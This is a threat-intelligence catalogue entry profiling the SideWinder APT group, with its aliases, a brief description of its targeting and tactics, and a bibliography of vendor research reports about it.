SYMBOLCOMMON_NAMEaka. SYNONYMS

SideWinder  (Back to overview)

aka: RAZOR TIGER, Rattlesnake, APT-C-17, T-APT-04

An actor mainly targeting Pakistan military targets, active since at least 2012. We have low confidence that this malware might be authored by an Indian company. To spread the malware, they use unique implementations to leverage the exploits of known vulnerabilities (such as CVE-2017-11882) and later deploy a Powershell payload in the final stages.


Associated Families

There are currently no families associated with this actor.


References
2021-03-04MalpediaMalpedia
@online{malpedia:20210304:malpedia:b8ffad2, author = {Malpedia}, title = {{Malpedia Page for family Sidewinder}}, date = {2021-03-04}, organization = {Malpedia}, url = {https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder}, language = {English}, urldate = {2021-03-12} } Malpedia Page for family Sidewinder
SideWinder SideWinder
2020-12-09Trend MicroJoseph C Chen, Jaromír Hořejší, Ecular Xu
@online{chen:20201209:sidewinder:a454abd, author = {Joseph C Chen and Jaromír Hořejší and Ecular Xu}, title = {{SideWinder Leverages South Asian Territorial Issues for Spear Phishing and Mobile Device Attacks}}, date = {2020-12-09}, organization = {Trend Micro}, url = {https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html}, language = {English}, urldate = {2020-12-10} } SideWinder Leverages South Asian Territorial Issues for Spear Phishing and Mobile Device Attacks
Meterpreter SideWinder SideWinder
2020-12-09AlienVault OTXAlienVault
@online{alienvault:20201209:sidewinder:65e0781, author = {AlienVault}, title = {{SideWinder APT South Asian Territorial Themed Spear Phishing and Mobile Device Attacks}}, date = {2020-12-09}, organization = {AlienVault OTX}, url = {https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/}, language = {English}, urldate = {2021-03-12} } SideWinder APT South Asian Territorial Themed Spear Phishing and Mobile Device Attacks
SideWinder SideWinder
2020-01-06Trend MicroEcular Xu, Joseph C Chen
@online{xu:20200106:first:bb9628c, author = {Ecular Xu and Joseph C Chen}, title = {{First Active Attack Exploiting CVE-2019-2215 Found on Google Play, Linked to SideWinder APT Group}}, date = {2020-01-06}, organization = {Trend Micro}, url = {https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/}, language = {English}, urldate = {2020-01-13} } First Active Attack Exploiting CVE-2019-2215 Found on Google Play, Linked to SideWinder APT Group
SideWinder
2019-02-26TencentTencent Yujian Threat Intelligence Center
@online{center:20190226:disclosure:d46aaed, author = {Tencent Yujian Threat Intelligence Center}, title = {{Disclosure of SideWinder APT's attack against South Asia}}, date = {2019-02-26}, organization = {Tencent}, url = {https://s.tencent.com/research/report/659.html}, language = {Chinese}, urldate = {2021-03-04} } Disclosure of SideWinder APT's attack against South Asia
SideWinder SideWinder
2018-07-16Medium SebdravenSébastien Larinier
@online{larinier:20180716:sidewinder:cb05fe4, author = {Sébastien Larinier}, title = {{APT Sidewinder: Tricks powershell, Anti Forensics and execution side loading}}, date = {2018-07-16}, organization = {Medium Sebdraven}, url = {https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c}, language = {English}, urldate = {2020-01-13} } APT Sidewinder: Tricks powershell, Anti Forensics and execution side loading
SideWinder SideWinder
2018-05-23TencentTencent Mimi Threat Intelligence Center
@online{center:20180523:sidewinderapttapt04:2f4c2cc, author = {Tencent Mimi Threat Intelligence Center}, title = {{SideWinder“响尾蛇”APT组织(T-APT-04):针对南亚的定向攻击威胁}}, date = {2018-05-23}, organization = {Tencent}, url = {https://s.tencent.com/research/report/479.html}, language = {Chinese}, urldate = {2020-01-06} } SideWinder“响尾蛇”APT组织(T-APT-04):针对南亚的定向攻击威胁
SideWinder SideWinder
2018-04-12Kaspersky LabsGReAT
@online{great:20180412:trends:babf7f6, author = {GReAT}, title = {{APT Trends report Q1 2018}}, date = {2018-04-12}, organization = {Kaspersky Labs}, url = {https://securelist.com/apt-trends-report-q1-2018/85280/}, language = {English}, urldate = {2020-01-08} } APT Trends report Q1 2018
SideWinder
2014-08-08FireEyeFireEye
@techreport{fireeye:20140808:sidewinder:ddc16cd, author = {FireEye}, title = {{Sidewinder Targeted Attack Against Android in the Golden Age of AD Libraries}}, date = {2014-08-08}, institution = {FireEye}, url = {https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/fireeye-sidewinder-targeted-attack.pdf}, language = {English}, urldate = {2021-03-04} } Sidewinder Targeted Attack Against Android in the Golden Age of AD Libraries
SideWinder

Credits: MISP Project